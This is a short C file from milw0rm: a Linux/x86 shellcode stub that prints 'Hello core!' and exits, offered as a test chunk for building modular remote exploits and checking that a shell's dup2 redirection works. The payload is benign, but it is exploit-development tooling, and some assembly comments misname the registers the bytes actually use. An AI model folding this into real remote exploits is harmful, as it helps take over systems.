/* writehello-core.c by Charles Stevenson <[email protected]>
*
* I made this as a chunk you can paste in to make modular remote
* exploits. I use it to see if my dup2_loop worked. If you don't
* get "Hello core!\n" back it's a good indicator your shell won't
* be functional the way you'd like.
*/
char hellcode[] = /* write(0,"Hello core!\n",12); linux/x86 by core */
"\x31\xdb" // xor %ecx,%ecx
"\xf7\xe3" // mul %ecx
"\x53" // push %ecx
"\x68\x72\x65\x21\x0a" // push $0xa216572
"\x68\x6f\x20\x63\x6f" // push $0x6f63206f
"\x68\x48\x65\x6c\x6c" // push $0x6c6c6548
"\xb2\x0c" // mov $0xc,%dl
"\x43" // inc %ebx
"\x89\xe1" // mov %esp,%ecx
"\xb0\x04" // mov $0x4,%al
"\xcd\x80" // int $0x80
// not needed.. makes it exit cleanly
// 7 bytes _exit(1) ... 'cause we're nice >:) by core
"\x31\xc0" // xor %eax,%eax
"\x40" // inc %eax
"\x89\xc3" // mov %eax,%ebx
"\xcd\x80" // int $0x80
;
int main(void)
{
void (*shell)() = (void *)&hellcode;
printf("%d byte (w/optional 7 byte exit) write(0,\"Hello core!\\n\",12); linux/x86 by core\n",
strlen(hellcode));
shell();
return 0;
}
// milw0rm.com [2005-11-09]
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